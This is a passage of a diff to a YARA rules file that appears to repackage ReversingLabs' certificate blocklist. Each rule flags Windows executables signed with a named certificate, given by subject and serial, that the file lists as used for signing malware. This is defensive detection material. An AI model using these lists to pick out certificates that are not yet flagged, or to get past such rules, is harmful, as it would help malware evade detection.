"3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10050-L10068" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7" score = 75 quality = 90 tags = "INFO, FILE" @@ -22187,22 +41978,22 @@ rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALVE ACTUATION LTD" and (pe.signatures[i].serial=="00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures[i].serial=="e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd") and 1637712000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38" + id = "da483b60-d400-54ef-84e0-ea00b299b466" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15936-L15952" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10070-L10086" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5" score = 75 quality = 90 tags = "INFO, FILE" @@ -22212,22 +42003,22 @@ rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Revo Security SRL" and pe.signatures[i].serial=="06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "55f1e321-ce70-519a-9a39-4278162edbef" + id = "2a56ff80-584b-5b8b-80ae-e763339cd17a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15954-L15970" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10088-L10106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727" score = 75 quality = 90 tags = "INFO, FILE" @@ -22237,22 +42028,22 @@ rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shulan Hou" and pe.signatures[i].serial=="74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ambidekstr LLC" and (pe.signatures[i].serial=="00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures[i].serial=="c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7") and 1616976000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b" + id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15972-L15988" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10108-L10124" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a" score = 75 quality = 90 tags = "INFO, FILE" @@ -22262,22 +42053,22 @@ rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Network Freak Limited" and pe.signatures[i].serial=="35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Venezia Design SRL" and pe.signatures[i].serial=="04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe" + id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15990-L16006" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10126-L10142" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d" score = 75 quality = 90 tags = "INFO, FILE" @@ -22287,22 +42078,22 @@ rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AEEPZ Limited" and pe.signatures[i].serial=="09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APRIL BROTHERS LTD" and pe.signatures[i].serial=="12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e" + id = "88ca65c4-ba0d-5676-979b-4fac737d4f21" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16008-L16024" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10144-L10160" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0" score = 75 quality = 90 tags = "INFO, FILE" @@ -22312,22 +42103,22 @@ rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Office Rat s.r.o." and pe.signatures[i].serial=="3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7" + id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16026-L16042" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10162-L10178" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a" score = 75 quality = 90 tags = "INFO, FILE" @@ -22337,22 +42128,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dening Hu" and pe.signatures[i].serial=="6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAMOYAJ LIMITED" and pe.signatures[i].serial=="02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9265bb94-b183-523f-91bf-9bc76ab63d6b" + id = "6da50886-7f15-5565-9a1a-f6fb25a729ac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16044-L16060" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10180-L10198" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40" score = 75 quality = 90 tags = "INFO, FILE" @@ -22362,22 +42153,22 @@ rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOUSE 9A s.r.o" and (pe.signatures[i].serial=="00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures[i].serial=="d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df") and 1640822400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9dd87769-73d0-5299-b6ed-936703abc78e" + id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16062-L16078" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10200-L10216" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140" score = 75 quality = 90 tags = "INFO, FILE" @@ -22387,22 +42178,22 @@ rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aleman Ltd" and pe.signatures[i].serial=="37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "videoalarm s. r. o." and pe.signatures[i].serial=="73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92" + id = "527b7963-340e-5d8f-b7e1-1269c0073ec9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16080-L16098" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10218-L10236" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e" score = 75 quality = 90 tags = "INFO, FILE" @@ -22412,22 +42203,22 @@ rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Marts GmbH" and (pe.signatures[i].serial=="00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures[i].serial=="be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9") and 1676246400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPSLTD PLYMOUTH LTD" and (pe.signatures[i].serial=="00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures[i].serial=="db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b") and 1621296000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1aebd2be-b22c-5102-a449-27025f61cce6" + id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16100-L16118" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10238-L10254" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733" score = 75 quality = 90 tags = "INFO, FILE" @@ -22437,22 +42228,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DIG IN VISION SP Z O O" and (pe.signatures[i].serial=="00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures[i].serial=="fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24") and 1604361600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hermetica Digital Ltd" and pe.signatures[i].serial=="0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8a6f4a15-08a5-5ca5-a743-55075726e744" + id = "727aba82-c908-51a6-9f1f-7fd8df424d8c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16120-L16136" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10256-L10274" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade" score = 75 quality = 90 tags = "INFO, FILE" @@ -22462,22 +42253,22 @@ rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BELLAP LIMITED" and pe.signatures[i].serial=="69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CUT AHEAD LTD" and (pe.signatures[i].serial=="00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures[i].serial=="c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90") and 1644624000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de" + id = "1268461b-676c-59b8-80c1-c54dbe1a265f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16138-L16154" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10276-L10294" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258" score = 75 quality = 90 tags = "INFO, FILE" @@ -22487,22 +42278,22 @@ rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE FAITH SP Z O O" and (pe.signatures[i].serial=="00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures[i].serial=="c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7") and 1644969600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5acd2e61-1c04-5cc5-8773-25856fc163c4" + id = "4520e544-7a41-5dde-b90b-46cf3349297c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16156-L16174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10296-L10312" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367" score = 75 quality = 90 tags = "INFO, FILE" @@ -22512,22 +42303,22 @@ rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMO-K Limited Liability Company" and (pe.signatures[i].serial=="00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures[i].serial=="d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b") and 1444780800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zimmi Consulting Inc" and pe.signatures[i].serial=="06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb" + id = "25229478-e891-5e0a-b738-6ca1fdd0012c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 